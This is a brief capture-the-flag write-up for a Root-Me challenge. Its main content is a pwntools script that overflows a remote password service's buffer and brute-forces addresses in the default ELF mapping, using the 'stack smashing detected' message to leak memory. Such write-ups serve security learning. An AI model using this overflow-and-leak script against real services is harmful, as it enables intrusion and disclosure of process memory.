root-me
No binary file was given; the service was running on a port and asking for a password.
By default, ELF binaries are mapped at 0x08048000.
So I tried to brute-force the layout, 0x08048fff-0x08048000:
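from pwn import *

# Walk the first page of the default mapping from the top down, two bytes at a time.
for i in xrange(0x08048ffe, 0x08048000, -0x2):
    c = remote("challenge03.root-me.org", 56529)
    c.recvuntil("service: ")
    # 424 bytes of padding (256 + 168), followed by the candidate address.
    c.send('A'*256 + 'B'*168 + p32(i))
    try:
        c.recvuntil("*** stack smashing detected ***:")
        # Print what the service emits between the banner and "terminated".
        print "[" + hex(i) + "]" + c.recvuntil("terminated")[:-10]
    except:
        #print "[-] crash"
        pass
    finally:
        # Close each connection so sockets do not pile up across iterations.
        c.close()

print "end ..."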
For further reference: LINK